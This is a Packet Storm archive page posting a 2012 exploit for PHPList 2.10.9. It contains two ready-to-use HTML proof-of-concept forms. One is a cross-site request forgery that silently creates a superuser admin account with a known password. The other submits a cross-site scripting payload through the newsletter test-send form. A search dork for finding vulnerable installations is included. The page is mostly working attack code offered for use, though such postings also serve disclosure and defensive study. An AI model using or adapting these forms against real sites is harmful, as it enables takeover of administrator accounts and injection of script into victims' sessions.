exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting
Posted Jan 26, 2012
Authored by Cyber-Crystal

PHPList version 2.10.9 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 156406175499db29e968856e912ccff0b2c4c1aa66ff94fd3a2977ec74379288
Download | Favorite | View

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
+-------------------------------------------------------------------------+
# Exploit Title : phplist - version 2.10.9 CSRF/XSS Vulnerability
# version       : 2.10.9                                                                                                                          
# Author        : Cyber-Crystal                                             
# Date          : n/a  
# Dork          : inurl:"powered by phplist - version 2.10.9"
# Software Link : http://www.phplist.com/                                                                                 
+-------------------------------------------------------------------------+
 
+---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method="POST" name="form2" action="http://localhost/lists/admin/?page=admin&start=">
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="loginname" value="root"/>
<input type="hidden" name="email" value="ss@ss.com"/>
<input type="hidden" name="password" value="toor"/>
<input type="hidden" name="superuser" value="1"/>
<input type="hidden" name="disabled" value=""/>
<input type="hidden" name="cbattribute[]" value="1"/>
<input type="hidden" name="attribute[1]" value="Checked"/>
<input type="hidden" name="change" value="Save Changes"/>
 
<input type="submit" value="exploit" />
</form>
</body>
</html>
 
+---+[XSS Send post ]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method=post action="http://localhost/lists/admin/?page=send&id=1&tab=Format" name="sendmessageform">
<input type=hidden name="workaround_fck_bug" value="1">
<input type=hidden name="htmlformatted" value="auto">
<input type=submit name=sendtest value="Exploit">
<input type=text name="testtarget" size=40 value='[XSS HERE]'>
<input type=hidden name=id value=7>
<input type=hidden name=status value="draft">
<input type=hidden name=expand value="0">
</form>
</body>
</html>
 
#-----------------------------------#
|  by Cyber-Crystal                 |
|                                   |
|  Mail : Cyb3r.Crystal@Gmail.com   |
|  Home // www.v4-team.com/cc       |
|                                   |
#-----------------------------------#
Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0
 
 
 
# the End

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close